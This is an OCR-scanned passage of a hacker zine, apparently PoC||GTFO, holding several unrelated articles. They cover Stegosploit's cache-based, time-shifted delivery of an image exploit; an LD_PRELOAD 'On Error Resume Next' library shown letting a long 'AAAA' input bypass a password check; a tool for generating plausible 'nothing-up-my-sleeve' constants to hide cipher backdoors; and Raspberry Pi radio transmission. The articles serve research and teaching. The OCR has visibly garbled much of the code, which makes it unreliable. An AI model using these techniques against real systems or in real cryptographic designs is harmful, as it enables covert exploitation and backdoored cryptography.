7.5.3 Time-Shifted Exploit Delivery 

^jt' GET/stego.jpg 




r HTTP 200 OK 

Expires: Aug 15 2015 



GET /stego.jpg 



ohai 




Time- Shifted Exploit Delivery is a technique 
where the exploit code does not need to be trig- 
gered at the same time it is delivered. The trigger 
can happen much later. 

Assume that we deliver kevin_polyglot as an 
image file via a simple <img> tag. The web server 
serving this image can choose to provide cache con- 
trol information and instruct the browser to cache 
this image for a certain time duration. The HTTP 
Expires response header can be used to this effect. 

Several days later, a URL pointing to 
kevin_polyglot is offered to the victim user. Upon 
clicking the link, the browser will detect a cache-hit 

49 http : //www . outguess . org/detection . php 



and load the "image" into the DOM without making 
a network connection. The exploit will then be trig- 
gered as before, with the exception that at the time 
of exploitation, no network traffic will be observed, 
as is illustrated by the following diagram. 

7.5.4 Mitigation Techniques 

Browser vendors need to start thinking about de- 
tecting polyglot content before it is rendered in the 
DOM. This is easier said than done. 

Server side applications that accept user gener- 
ated images should currently transcode all received 
images— for example, transcode a JPG file to a PNG 
file with slightly degraded quality, and back to JPG. 
The idea here is to damage any steganographically 
encoded data. 

7.6 Concluding Thoughts 

While the full implications of practical exploit de- 
livery via steganography and polyglots are not yet 
clear, I would like to present a few thoughts. 

Sophisticated exploit delivery techniques are 
probably closer to being reality than previously es- 
timated. 

My research for Stegosploit shows that conven- 
tional means of detecting malicious software fall 
short of stopping such attacks. 

Data containers, e.g. images, previously pre- 
sumed passive and non-offensive, can now be used 
in practical attack scenarios. 
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It is easier to detect polyglot files than stegano- 
graphically encoded images. I ran a few tests with 
stegdetect, 49 one of the de facto tools used to de- 
tect steganography in images. My initial results 
from stegdetect show that none of the encoded 
files were successfully detected. 

This is not a fault of stegdetect per se. 
stegdetect is built to detect steganography 
schemes that it knows of. It has a mode that 
supports linear discriminant analysis to automate 
detection of new steganography methods, however 
it requires several samples of normal and stegano- 
graphic images to perform its classification. I have 
not tested this yet. 

In proper PoC||GTFO style, Stegosploit is dis- 
tributed as a picture of a cat attached to this PDF 
file. 50 
EOF 
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8 On Error Resume Next 

by Jeffball 

Don't you just long for the halcyon days of Visual Basic 6 (VB6)? Between starting arrays at 1 and 
only needing signed data types, Visual Basic was just about as good as it gets. Well, I think it's about time 
we brought back one of my favorite features: On Error Resume Next. For those born too late to enjoy the 
glory of VB6, On Error Resume Next allowed those courageous VB6 ninjas who dare wield its mightiness to 
continue executing at the next instruction after an exception. While this may remove the pesky requirement 
to handle exceptions, it often caused unexpected behavior. 

When code crashes in Linux, the kernel sends the SIGSEGV signal to the faulting program, commonly 
known as a segfault. Like most signals, this one too can be caught and handled. However, if we don't properly 
clean up whatever caused the segfault, we'll return from that segfault just to cause another segfault. In this 
case, we simply increment the saved RIP register, and now we can safely return. The third argument that is 
passed to the signal handler is a pointer to the user-level context struct that holds the saved context from 
the exception. 

1 void segfault _ sigact ion ( int signal , siginfo_t *si , void * ptr) { 
((ucontext_t *) ptr )— >uc_mcontext . gregs [REG_RIP] + + ; 

3 } 



Now just a little code to register this signal handler, and we're good to go. In addition to SIGSEGV, 
we'd better register SIGILL and SIGBUS. SIGILL is raised for illegal instructions, of which we'll have many 
since our On Error Resume Next handler may restart a multi-byte instruction one byte in. SIGBUS is used 
for other types of memory errors (invalid address alignment, non-existent physical address, or some object 
specific hardware errors, etc) so it's best to register it as well. 

struct sigaction sa ; 

memset(&sa , 0, sizeof ( sigact ion )) ; 

sigemptyset (&sa . sa_mask) ; 

sa . sa_sigact ion = segfault _ sigact ion ; 

sa.sa_flags = SA_SIGINFO ; 

sigaction (SIGSEGV, &sa , NULL); 
sigaction (SIGILL , &sa, NULL); 
sigaction (SIGBUS, &sa , NULL); 



In order to help out the users of buggy software, I've included this code as a shared library that registers 
these handlers upon loading. If your developers are too busy to deal with handling errors or fixing bugs, 
then this project may be for you. To use this code, simply load the library at runtime with the LD_PREL0AD 
environment variable, such as the following: 

1 $ LD_PRELOAD=./liboern . so ./login 



Be wary though, this may lead to some unexpected behavior. The attached example shell server illustrates 
this, but can you figure out why it happens? 51 

1 $ nc localhost 5555 

Please enter the password: 
3 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA^ 

^ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
5 Password correct , starting access shell ... 



unzip pocorgtfo08.pdf onerror.zip #Beware of spoilers! 
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SOLDERING IS EASY 



HERE'S HOW TO DO IT 




THE IRON IS 
HOT!! BE CAREFUL! 



*1» 




YOUR KIT SHOULD COME 
WITH INSTRUCTIONS 
FOR WHAT PARTS GO 
WHERE AND WHA T WA Y! 



CLEAN THE TIP OF 
YOUR IRON BEFORE 
EACH SOLDER 
CONNECTION! 



PUT YOUR PART IN 
PLACE. BEND OUT 
THE LEADS SO IT 
STAYS IN PLACE 



LEAD 




PUT THE PCB DOWN SO 
YOU CAN SOLDER. 



CAREFUL WITH THE 
SURFACE UNDERNEATH! 



FIND SOME GOOD WAY 
TO KEEP IT STEADY 



OK, LETS SOLDER/ 

FIRST, YOU WANT TO HEA T 
BOTH THE PAD AND THE LEAD 

FOR ABOUT 1 SECOND 




IF YOU NEED A THIRD HAND, YOU CAN MAKE 
A STANDING COIL OF THE SOLDER INSTEAD 
OF HOLDING IT IN YOUR HAND 



^~4ad 




PSST! 
CLEAN THE 
TIP FIRST! 



TOUCH THE SOLDERING IRON TO 
BOTH THE PAD AND THE LEAD! 



7 7"~ 

NOW FEED SOLDER 

UNDER THE TIP 

OF THE IRON ABOUT 
1-3 MM 




STOP FEEDING SOLDER, 




/ 



then HOLD FOR 1 
SECOND 

SO THE SOLDER CAN 
FLOW PROPERLY 



\ A SOOP CONNECTION 

\\ COVERS THE PAP 

>\ WITHOUT TOUCHING OTHER PAPS 

\V and SURROUNDS 
\\ THE LEAD 



PCB 



PCB 



KHEL 



CUT THE LEADS OFF 

WITH THE WIRE CUTTER 



EYES DON'T 
LIKE JUMPING 
LEAD BITS! 




) THE SMOKE FROM THE MELTING SOLDER 
f IS NOT TOXIC, BUT BLOW GENTLY ON IT 
TO AVOID BREATHING IT. 



LEAD ON THE OTHER HAND 
IS TOXIC, AND GETS ON 
YOUR SKIN MEN HOLDING 
THE SOLDER. 



SOME LEADS ARE ALREADY SHORT . 
YOU DON'T NEED TO CUT THOSE. 





KEEP SOLDERING EACH PART IN ITS 
CORRECT PLACE. REMEMBER SOME 
PARTS NEED TO GO IN A CERTAIN WAY! 

IF ALL YOUR CONNECTIONS ARE 
GOOD, YOUR CIRCUIT WILL 
JUST WORK! 

THERE ARE MORE TRICKS YOU WILL LEARN AS 
YOU KEEP SOLDERING, BUT NOW YOU KNOW 
ENOUGH TO MAKE MANY COOL THINGS. 



WASH YOUR HANDS 
WHEN YOU'RE DONE! 



I SOLDERING COURSE BY MITCH ALTMAN 
HTW//CORNFIELDELECTRONICS.COM 

COMIC ADAPTATION BY ANDIE NORDGREN 
HTT P >■•/ '/LOG ANDIE.SE 

PUBLIC DOMAIN, USE, COPY, SPREAD! 



46 



Unbrick My Part 



by EVM and Tommy Brixton 
(no relation to Toni Braxton) 

Don't leave me stuck in this state 

Back out the changes you made 

Restore and cycle my power 

Take these double faults away 

I need you to reflash me now 

My screen just won't come on 

Please hold me now, use and operate me 

Unbrick my part 

Flash my ROM on again 

Undo the damage you caused 

When you jacked up my image and wrote it back on 

Un-ice this freeze 

I crashed so many times 

Unbrick my part 

My part 

Restore my interrupt table 

Fix up my volume labels 

My debug registers are filling with tears 

Come and clear these bugs away 

My checksums are all broken 

My CRCs are bad 

And life is so cruel without you to operate me 

Unbrick my part 

Flash my ROM on again 

Undo the damage you caused 

When you jacked up my image and wrote it back on 

Un-ice this freeze 

I crashed so many times 

Unbrick my part 

My part 

Don't leave me stuck in this state 

Back out the changes you made 

Please hold me now, use and operate me 
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10 Backdoors up my Sleeve 



SHA-l was designed by the NSA and uses 
the constants 5a827999, 6ed9ebal, 8f lbbcdc, and 
ca62cld6. In case you haven't already noticed, 
these are hex representations of 2 30 times the square 
roots of 2, 3, 5, and 10. 

NIST's P-256 elliptic curve was also designed by 
the NSA and uses coefficients derived from a hash of 
the seed c49d3608 86e70493 6a6678el 139d26b7 
819f 7e90. Don't look for decimals of square roots 
here; we have no idea where this value comes from. 

Which algorithm would you trust the most? 
Right, SHA-l. We don't know why 2, 3, 5, 10 rather 
than 2, 3, 5, 7, or why the square root rather than 
the logarithm, but this looks more convincing than 
some unexplained random-looking number. 

Plausible constants such as \[2 are often called 
"nothing- up-my-sleeve" (NUMS) constants, mean- 
ing that there is a kinda-convincing explanation of 
their origin. But it isn't impossible to backdoor an 
algorithm with only NUMS constants, it's just more 
difficult. 

There are basically two ways to create a NUMS- 
looking backdoored algorithm. One must either (1) 
bruteforce NUMS constants until one matches the 
backdoor conditions or (2) bruteforce backdoor con- 
stants until one looks NUMS. 

The first approach sounds easier, because brute- 
forcing backdoor constants is unlikely to yield a 
NUMS constant, and besides, how do you check that 
some constant is a NUMS? Precompute a huge table 
and look it up? In that case, you're better off brute- 
forcing NUMS constants directly (and you may not 
need to store them). But in either case, you'll need 
a lot of NUMS constants. 

I've been thinking about this a lot after my re- 
search on malicious hash functions. So I set out 
to write a simple program that would generate a 
huge corpus of NUMS-ish constants, to demonstrate 
to non-cryptographers that "nothing-up-my-sleeve" 
doesn't give much of a guarantee of security, as 
pointed out by Thomas Pornin on Stack Exchange. 

The numsgen.py program generates nearly two 
million constants, while I'm writing this. 52 Noth- 
ing new nor clever here; it's just about exploiting 
degrees of freedom in the process of going from a 

52 https : / / github . com/ veorq/ numsgen 
unzip pocorgtfo08.zip numsgen.py 

53 http : // saf ecurves . cr . yp . to/bada55 . html 



by JP Aumasson 

plausible seed to actual constants. In that PoC pro- 
gram, I went for the following method: 

1. Pick a plausible seed 

2. Encode it to a byte string 

3. Hash it using some hash function 

4. Decode the hash result to the actual constants 

Each step gives you some degrees of freedom, and 
the game is to find somewhat plausible choices. 

As I discovered after releasing this, DJB and oth- 
ers did a similar exercise in the context of manip- 
ulated elliptic curves in their "BADA55 curves" pa- 
per, 53 though I don't think they released their code. 
Anyway, they make the same point: "The BADA55- 
VPR curves illustrate the fact that 'verifiably pseu- 
dorandom' curves with 'systematic' seeds generated 
from 'nothing- up- my-sleeve numbers' also do not 
stop the attacker from generating a curve with a 
one-in-a-million weakness." The two works obvi- 
ously overlap, but we use slightly different tricks. 

10.1 Seeds 

We want to start from some special number, or, 
more precisely, one that will look special. We cited 
SHA-l 's use of y/2, V3, VE, VlO, but we could have 
cited 

• 7T used in ARIA, BLAKE, Blowfish, 

• MD5 using "the integer part of 4294967296 x 

abs(sin(i)y\ 

• SHA-l using 0123456789abcdef f edcba98- 
76543210f0eld2c3, 

• SHA-2 using square roots and cube roots of 
the first primes, 

• NewDES using the US Declaration of Indepen- 
dence, 

• Brainpool curves using SHA-l hashes of tt and 
e. 
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Special numbers may thus be universal math 
constants such as 7r or e, or some random-looking 
sequence derived from a special number: small inte- 
gers such as 2, 3, 5, or some number related to the 
design (like the closest prime number to the security 
level), or the designer's birthday, or his daughter's 
birthday, etc. 

For most numbers, functions like the square root 
or trigonometric functions yield an irrational num- 
ber, namely one that can't be expressed as a frac- 
tion, and with an infinite random-looking decimal 
expansion. This means that we have an infinite 
number of digits to choose from! 

Let's now enumerate some NUMS numbers. Ob- 
viously, what looks plausible to the average user may 
not be so for the experienced cryptographer, so the 
notion of "plausibility" is subjective. Below we'll re- 
strict ourselves to constants similar to those used in 
previous designs, but many more could be imagined 
(like physical universal constants, text rather than 
numbers, etc.). In fact, we'll even restrict ourselves 
to irrational numbers: 7r, e, cp = (1 + y/h)/2 (the 
golden ratio), Euler-Mascheroni's 7, Apery's f(3) 
constant, and irrationals produced from integers by 
the following functions 

• Natural logarithm, ln(x), irrational for any ra- 
tional x > 1; 

• Decimal logarithm, log(x), irrational unless 
x = 10 n for some integer n\ 

• Square root, y/x, irrational unless x is a per- 
fect square; 

• Cubic root, yfx, irrational unless x is a perfect 
cube; 

• Trigonometric functions: sine, cosine, and tan- 
gent, irrational for all non-zero integers. 

We'll feed these functions with the first six 
primes: 2, 3, 5, 7, 11, 13. This guarantees that 
all these functions will return irrationals. 

Now that we have a bunch of irrationals, which 
of their digits do we record? Since there's an infinite 
number of them, we have to choose. Again, this pre- 
cision must be some plausible number. That's why 
this PoC takes the first TV significant digits— rather 
than just the fractional part— for the following val- 
ues of TV: 42, 50, 100, 200, 500, 1000, 32, 64, 128, 
256, 512, and 1024. 



We thus have six primes combined with seven 
functions mapping them to irrationals, plus six ir- 
rationals, for a total of 48 numbers. Multiplying 
by twelve different precisions, that's 576 irrationals. 
For each of those, we also take the multiplicative in- 
verse. For the one of the two that's greater than one, 
we also take the fractional part (thus stripping the 
leading digit from the significant digits). We thus 
have in total 3 x 576 = 1728 seeds. 

Note that seeds needn't be numerical values. 
They can be anything that can be hashed, which 
means pretty much anything: text, images, etc. 
However, it may be more difficult to explain why 
your seed is a Word document or a PCAP than if 
it's just raw numbers or text. 

10.2 Encodings 

Cryptographers aren't known for being good pro- 
grammers, so we can plausibly deny an awkward en- 
coding of the seeds. The PoC tries the obvious raw 
bytes encoding, but also ASCII of the decimal, hex 
(lower and upper case), or even binary digits (with 
and without the 0b prefix). It also tries Base64 of 
raw bytes, or of the decimal integer. 

To get more degrees of freedom you could use 
more exotic encodings, add termination characters, 
timestamps, and so on, but the simpler the better. 

10.3 Hashes 

The purpose of hashing to generate constants is at 
least threefold. 

1. Ensure that the constant looks uniformly ran- 
dom, that it has no symmetries or structure. This 
is, for example, important for the hash functions' 
initial values. Hash functions can thus "sanitize" 
similar NUMS by produce completely different con- 
stants: 

1 »> hex ( int (math . tanh ( 5 ) * 10* * 16) ) 

'0x23861f0946f3a0 ' 
3 »> shal(_) . hexdigest () 

' b96cf4dcd99ae8aec4e6d0443c46fe0651a44440 ' 
5 »> hex ( int (math . tanh (7) *10**16) ) 

'0x2386ee907ec8d6 ' 
7 »> shal (_) . hexdigest () 

'7c25092e3fed592eb55cf26b5efc7d7994786d69 ' 



2. Reduce the length of the number to the size of 
the constant. If your seed is the first 1000 digits of 
7r, how do you generate a 128-bit value that depends 
on all the digits? 
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3. Give the impression of "cryptographic 
strength". Some people associate the use of cryptog- 
raphy with security and confidence, and may believe 
that constants generated with SHA-3 are safer than 
constants generated with SHA-1. 

Obviously, we want a cryptographic hash rather 
than some fast-and-weak hash like CRC. A natural 
choice is to start with MD5, SHA-1, and the four 
SHA-2 versions. You may also want to use SHA-3 
or BLAKE2, which will give you even more degrees 
of freedom in choosing their version and parameters. 

Rather than just a hash, you can use a keyed 
hash. In my PoC program, I used HMAC-MD5 and 
HMAC-SHA1, both with 3x3 combinations of the 
key length and value. 

Another option, with even more degrees of free- 
dom, is a key derivation— or password hashing— 
function. My PoC applies PBKDF2-HM AC-SH Al , 
the most common instance of PBKDF2, with: either 
32, 64, 128, 512, 1024, 10, 100, or 1000 iterations; a 
salt of 8, 16, or 32 bytes, either all-zero or all-ones. 
That's 48 versions. 

The PoC thus tries 6 + 18 + 48 = 72 different 
hash functions. 

10.4 Decoding 

Decoding of the hashes to actual constants depends 
on what constants you want. In this PoC I just 
want four 32-bit constants, so I only take the first 



128 bits from the hash and parse them either as big- 
or little-endian. 

10.5 Conclusion 

That's all pretty simple, and you could argue that 
some choices aren't that plausible (e.g., binary en- 
coding). But that kind of thing would be enough 
to fool many, and most would probably give you 
the benefit of the doubt. After all, only some 
pesky cryptographers object to NIST's unexplained 
curves. 

So with 1728 seeds, 8 encodings, 72 hash func- 
tion instances, and 2 decodings, we have a total of 
1728 x8x72x2 = l, 990, 656 candidate constants. If 
your constants are more sophisticated objects than 
just 32-bit words, you'll likely have many more de- 
grees of freedom to generate many more constants. 

This demonstrates that any invariant in a crypto 
design— constant numbers and coefficients, but also 
operations and their combinations— can be manip- 
ulated. This is typically exploited if there exists a 
one in a billion (or any reasonably low-probability) 
weakness that's only known to the designer. Var- 
ious degrees of exclusive exploitability ("NOBUS") 
may be achieved, depending on what's the secret: 
just the attack technique, or some secret value like 
in the malicious SHA-1. 

The latest version of the PoC is copied below. 
You may even use it to generate non-malicious con- 
stants. 



2 
4 
6 
8 
10 
12 
14 
16 
18 
20 
22 
24 



#! / usr / bin /env python 

#https : // git hub . com/ v eorq /numsgen 
it it it 

Generator of " not hing— up— my— s le e ve " (NUMS) constants. 

This aims to demonstrate that NUMS-looking constants shouldn't be 
blindly trusted . 

This program may be used to bruteforce the design of a malicious cipher , 

to create somewhat rigid curves , etc . It generates close to 2 million 

constants , and is easily tweaked to generate many more. 

The code below is pretty much self —explanatory . Please report bugs. 

See also <http://safecurves.cr.yp.to/bada55.html> 

Copyright (c) 2015 Jean — Philippe Aumasson <j eanphilippe . aumasson@gmail . com> 

Under CC0 license <http://creativecommons.Org/publicdomain/zero/l.0/> 
11 11 11 

from base64 import b64encode 
from binascii import unhexlify 
from itertools import product 
from struct import unpack 
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26 
28 
30 
32 
34 
36 
38 
40 
42 
44 
46 
48 
50 
52 
54 
56 
58 
60 
62 
64 
66 
68 
70 
72 
74 
76 
78 
80 
82 
84 
86 
88 



from Crypto. Hash import HMAC, MD5, SHA, SHA224 , SHA256 , SHA384 , SHA512 
from Crypto . Protocol .KDF import PBKDF2 
import mpmath as mp 
import sys 

# add your own special primes 
PRIMES = (2, 3, 5, 7, 11, 13) 

PRECISIONS = ( 

42, 50, 100, 200, 500, 1000, 
32, 64, 128, 256, 512, 1024, 

) 

# set mpmath precision 
mp.mp.dps = max (PRECISIONS) +2 

# some popular to — irr at ional transforms (beware exceptions) 
TRANSFORMS = ( 

mp. In , mp. log 10 , 

mp. sqrt , mp. cbrt , 

mp. cos , mp. sin , mp. tan , 

) 



IRRATIONALS = [ 
mp. phi , 
mp. pi , 
mp. e , 
mp. euler , 
mp. apery , 
mp. log (mp. pi ) , 

] +\ 

[ abs ( transform ( prime )) \ 

for (prime, transform) in product (PRIMES , TRANSFORMS) ] 

SEEDS = [] 

for num in IRRATIONALS: 
i n v = 1 / num 

s e e d 1 = mp . n s t r ( num , mp . mp . dps ) . r e p 1 a c e ( ' . ' , 1 ' ) 
seed 2 = mp. nst r ( inv , mp.mp. dps ).replace('.', ' ' ) 
for precision in PRECISIONS: 

SEEDS . append ( seed 1 [: precision]) 

SEEDS . append (seed2 [ : precision]) 
i f num >= 1 : 

s e e d 3 = mp . n s t r ( num , mp . mp .dps) . split ( ' . ') [1] 

for precision in PRECISIONS: 

SEEDS, append (seed3 [ : precision]) 

continue 
if inv >= 1: 

seed4 = mp. nst r (inv , mp.mp. dps) . split ( ' . ') [1] 

for precision in PRECISIONS: 

SEEDS . append (seed4 [ : precision]) 



# some common encodings 
def intlO (x) : 
return x 

def int2 (x) : 

return bin(int(x)) 

def int 2 _ nopref ix (x) : 

return bin ( int (x) ) [ 2 : ] 
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90 
92 
94 
96 
98 
100 
102 
104 
106 
108 
110 
112 
114 
116 
118 
120 
122 
124 
126 
128 
130 
132 
134 
136 
138 
140 
142 
144 
146 
148 
150 
152 
154 



def hex_lo (x) : 

xhex = '%x' % int(x) 
if len (xhex) % 2: 

xhex = 1 0 ' + xhex 
return xhex 

def hex_hi (x) : 

xhex = '%K' % int(x) 
if len(xhex) % 2: 

xhex = ' 0 ' + xhex 
return xhex 

def raw (x) : 

return hex_lo (x) . decode (' hex ' ) 

def base64_from_int (x) : 
return b64encode(x) 

def base64_from_raw (x) : 

return b64encode (raw (x) ) 

ENCODINGS = ( 
intlO , 
int2 , 

int 2 _ nopref ix , 
hex_lo , 
hex_hi , 
raw , 

base64_from_int , 
base64_from_raw , 

) 



def do_hash(x, ahash): 
h = ahash . new ( ) 
h . update (x) 
return h. digest () 

def do_hmac(x, key, ahash): 

h = HMAC. new ( key , digestmod=ahash ) 
h . update (x) 
return h. digest () 

HASHINGS = [ 

lambda x: do_hash(x, MD5) , 

lambda x: do_hash(x, SHA) , 

lambda x: do_hash(x, SHA224) , 

lambda x: do_hash(x, SHA256) , 

lambda x: do_hash(x, SHA384) , 

lambda x: do_hash(x, SHA512) , 



# HMACs 

for hf in (MD5, SHA) : 

for keybyte in ('\x55', '\xaa 1 , '\xff'): 
for keylen in (16 , 32 , 64) : 

HASHINGS . append ( lambda x , \ 

hf=hf , keybyte=keybyte , key len=key len : \ 
do_hmac(x, keybyte * key len , hf)) 

# PBKDF2s 

for n in (32, 64, 128, 512, 1024, 10, 100, 1000): 
for saltbyte in ('\x00', '\xff'): 
for salt len in (8 , 16 , 32) : 

HASHINGS . append ( lambda x , \ 
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156 
158 
160 
162 
164 
166 
168 
170 
172 
174 
176 
178 
180 
182 
184 
186 
188 
190 
192 
194 
196 
198 
200 
202 
204 



n=n , salt by te=salt byte , salt len = salt len : \ 
PBKDF2(x, saltbyte*saltlen , count=n) ) 



DECODINGS = ( 
lambda h : 
unpack 
unpack 
unpack 
unpack 
lambda h : 
unpack 
unpack 
unpack 
unpack 

) 



■>L' 
■>L' 
■>L' 
■>L' 

'<L' 
•<L' 
'<L' 
•<L' 



h[:4]) [0] , 
h[4:8]) [0] , 
h[8:12]) [0] , 
h[12:16]) [0] ,) 

h[:4]) [0] , 
h[4:8]) [0] , 
h[8:12]) [0] , 
h[12:16]) [0] ,) 



MAXNUMS =\ 

len (SEEDS) *\ 
len (ENCODINGS) *\ 
len (HASHINGS) *\ 
len (DECODINGS) 



def main ( ) : 
try : 

nbnums = int ( sy s . argv [ 1 ] ) 
if nbnums > MAXNUMS: 
raise ValueError 

except : 

print 'expected argument < %d (~2~%.2f) '\ 

% (MAXNUMS, mp. log (MAXNUMS, 2)) 
return —1 
count = 0 

for seed, encoding, hashing, decoding in\ 

product (SEEDS, ENCODINGS, HASHINGS, DECODINGS) 

constants = decoding ( hashing ( encoding ( seed )) ) 

for constant in constants : 

sys . st dout . wr it e ( ' %08x 1 % constant) 
print 

count += 1 
if count = nbnums: 
return count 



if name = ' main_ 

sys . exit ( main ( ) ) 
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YOU HAVEN'T SEEN MY 
STATION SINCE I INSTALLED 
SSTV WITH THE NEW 
ROBOT AOO CONVERTER, 
HAVE YOU TOM ? 




"The kips really love papVtv station; 
Tom,,, and So do i, BEFORE Pick pot in 
SSTV l REALLY WASN'T Too INTERE $TEP 

m hisnoisy rii n wam zuack. Bar s>$rv 
14 much fuNf^^^^m^F^^TrS 




Tom, you ve really got to get 4 
ROBOT 400 converter for you« 

STATION. YOUR XYL ANP K\OS WILL 
REALLY GET /NTo THE ACTION W/TH IT/ 



NOT WiTv4 THE ROBOT 40O CONVERTER TOM, 

Just Flue? it i kito your tranSce/ ver, connect 

A TV MONITOR OR YOUR HOME TV SET/ TUNE TO 
14.230 AND YOU'RE IN OPERATION// ^ 




SINCE YOU USE YOUR 
HOME TV SET AS A 
MONITOR* ALL IT 
COSTS IS THE 
POR-nwE R0BOT400 
CONVERTS?. WRITC J 
TODAY FOR yOUR 
SSTV FACT PACK 

prom rob>ot. 
its free anp 

tells all about 

SSTV/ 




[ROBOT] SSSKrcm 



7591 CONVOY CT. 
SAN DIEGO, CA 92111 



R9 
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11 Naughty Signals; or, the Abuse of a Raspberry Pi 



by Russell Handorf 



There are a lot of different projects that have 
rejuvenated interest in HAM Radio, more notably 
Software Defined Radio (SDR). The more promi- 
nent projects and products are the USRP by Ettus 
Research, BladeRF by Nuand, and the HackRF by 
Mike Ossmann (in the order from the most expen- 
sive to least expensive). These radios vary in capa- 
bility and have their own distinct utility, depending 
on what radio communication you'd like to study; 
however, if all you are specifically interested in is re- 
ceiving a simplistic signal, then the Realtek SDR is 
typically the best and cheapest choice. This article 
will show you how to combine a Realtek SDR and 
a Raspberry Pi into a poor man's software defined 
radio tool for exploring how to receive and transmit 
in related radio systems. 



code that generated spread-spectrum clock signals 
to output FM on GPIO pin #4. Oliver Mattos and 
Oskar Weigl have since enhanced PiFM to add more 
capabilities. 

Be aware, however, that this technique has an- 
other problem beyond bleeding RF and having to 
use filters. Namely, the transmitter doesn't shut 
down gracefully after you quit PiFM. Therefore, 
you'll need a script to silence the transmission. We'll 
call it pi - shutdown, sh in the various examples that 
follow. 



#/bin /bash 
#pi— shutdown . sh 

touch /tmp/empty && /home/ pi / pifm /tmp/empty 



11.1 Bandpass Filter 

It is very important to have and to use a band- 
pass filter when using the Raspberry Pi as an FM 
transmitter, because PiFM is essentially a square 
wave generator. This means that you'll have a lot 
of harmonics as depicted in Figure 21. While the 
direct operational frequency range of PiFM is ap- 
proximately 1 MHz to 250 MHz, the harmonics are 
still strong enough to reach frequencies below 1 MHz 
and as high as 500 MHz. 

Because of these square wave characteristics, a 
mechanical SAW filter would be ideal to be able to 
control the frequencies you wish to transmit. How- 
ever, there filters can set you back more than the 
Raspberry Pi, and may be hard to come by, unless 
there's a neighborly Ham Radio Outlet near you. So 
you may have to make your own band-pass filter. 

To make your own high band and/or low band 
pass filters, you can assemble them based on the 
schematic in Figure 19. 54 Parts for the various am- 
ateur bands are listed in Figure 20. 

11.2 Raspberry Pi FM Transmitter 

For over a year now, it has been documented how 
to turn the Raspberry Pi into an FM transmitter 
by using the PiFM software. 55 Richard Hirst first 
demonstrated this technique in some C and Python 

54 http : //www.kitsandparts . com/univlpf ilter .php 
55 https : / / github . com/rm-hull/pif m 



11.3 AFSK 

Audio Frequency Shift Keying (AFSK) is simply 
a method to modulate digital data as an analogue 
tone; you'll certainly recognize this as the tones your 
modem made. AFSK characteristically represents 1 
as a "mark" and 0 as a "space". While not fast, 
AFSK does work very well in many applications 
where data is communicated over a consistent radio 
frequency. Because of these attributes, AFSK is fre- 
quently used for radio communications in industrial 
applications, embedded systems, and more. Using 
a program called minimodem, you'll be easily able 
to receive and transmit AFSK with a Realtek SDR 
and a Raspberry Pi. Marcl from kprod.eu demon- 
strated some very simple techniques for doing so, 
which a few other neighbors have been tweaked and 
updated in the examples to follow. 

To receive 1200 baud AFSK transmissions, a 
one-line script is all that's needed: 

1 rtl_fm -f 146. 0M -M wbfm -s 200000 \ 

-r 48000 -o 6 \ 

3 | sox -traw -r48k -es -bl6 -cl -VI - \ 

—twav — \ 
5 | minimodem — rx —8 1200 



What's happening here is that the program 
rtl.fm is tuned to 146.0 MHz, sampling at 200,000 
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samples per second and converting the output at a 
sample rate of 48000 Hz. The output from this is 
sent to sox, which is converting the audio received 
to the WAV file format. The output from sox is 
then sent to minimodem, which is decoding the WAV 
stream at 1200 baud, 8 bit ASCII. 

Transmitting an AFSK signal is just as easy: 



echo "knock knock... : "date +%c v " 
| minimodem — tx — f —8 1200 

— f /home/ pi / sent e nee . wav 
/home / pi / pifm /home/ pi / sentence, wav 

146.0 48000 
/home/ pi / pi— shutdown . sh 



11.4 Other Transmission Examples 

Because of the script ability and simplicity of PiFM, 
other forms of transmissions become easily achiev- 
able too. 



Numbers Station 

A numbers station is typically a government-owned 
transmitter that sends encoded messages to spies, 
operators, or employees of that said government 
anywhere in the world, where the messages are typ- 
ically one way and seemingly random. The script 
below mimics the Cuban numbers station identified 
as HMO 1. 57 What is interesting about it is that the 
data it sends is encoded with a common HAM Ra- 
dio protocol called RDFT. Transmitting RDFT on a 
Raspberry Pi can be difficult, therefore using a sim- 
ple FM transmission of THOR8 or QPSK256 should 
be adequate; using FLDIGI should be of great help 
to create these messages. 

A script can easily speak a series of words into 
the air by piping them into the text2wave utility: 



system ("echo $text | text2wave -F 22050 
"| /home/pi/pifm - 144 22050"); 



Morse Code (CW) 

Either done by playing a pre-made audio file with 
dits and dahs, or by using the cwwav program 
written by Thomas Horsten to output directly to 
PiFM. 56 



echo hello world 


\ 


cwwav -f 700 -w 20 


\ 


— o /home/ pi /morse . wav 




/home/pi/pifm /home/ pi /morse . wav 


\ 


146.0 48000 




/home/ pi / pi— shutdown . sh 





56 https : / /github . com/Kerrick/cwwav 
57 http : / / www . qsl . net /py4zbz/ eni . htm 
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DVBT with Metadata 

One common practice for those who work with the 
RTL dongle is to remove to remove the DVB-T 
digital television kernel module. To receive this 
challenge, however, you will need to re-enable that 
module. To transmit it, you'll need hardware from 
Hides, 58 which can be had for a very low cost. The 
script below works with the UT-100C. 



8 http : //www . hides . com . tw/product_cg74469_eng . html 
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Figure 19: Bandpass Filter for Reducing PiFM Harmonics 
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modprobe usb— it950x 
mkfifo ~/desktop 

avconv -f xllgrab -s 1024x768 \ 

— framerate 30 — i :0.0 \ 
-vcodec libx264 -s 720x576 \ 

— f mpegts \ 
— mpegts_original_network_id 1 \ 

— mpegts_transport _stream_id 1 \ 

— mpegts_service_id 1 \ 
—metadata \ 

service_provider="FCC CALL SIGN" \ 

—metadata \ 
service_name=" D ialin for Dollars!" \ 
— muxrate 3732k — y ~/desktop & 

tsrfsend ~/desktop 0 730000 6000 4 \ 
1/2 1/4 8 0 0 & 



SSTV 

Gerrit Polder developed a simple means of convert- 
ing an image into a SSTV signal and then sending 
it out via the PiFM utility. Using his program, PiS- 
STV, command line transmissions of SSTV broad- 
casts with the Raspberry Pi are easy to achieve with- 



out the need for a graphical environment. 

11.5 Howdy to the caring Neighbors 

Thanks to the PiFM program, there are many 
portable options allowing HAM operators, experi- 
menters, and miscreants to explore and butcher the 
radio waves on the cheap. The main goal of this ar- 
ticle is to document the work of many friendly folks 
in this arena, gathering in one place the information 
currently scattered across the bits and bobs of the 
Internet. Owing to the brilliant hacks of these neigh- 
bors, it should become apparent why any radio nut 
should consider having a Raspberry Pi armed with 
a filter and some code. While out of scope for the 
article, it should also become clear how you too can 
make a very inexpensive and portable HAM station 
for a large variety of digital and analog modes. 

I'd like to extend a warm, hearty, and, even- 
tually, beer-supplemented thank-you to Dragorn, 
Zero_ Chaos, Rick Mellendick, DaKahuna, Justin 
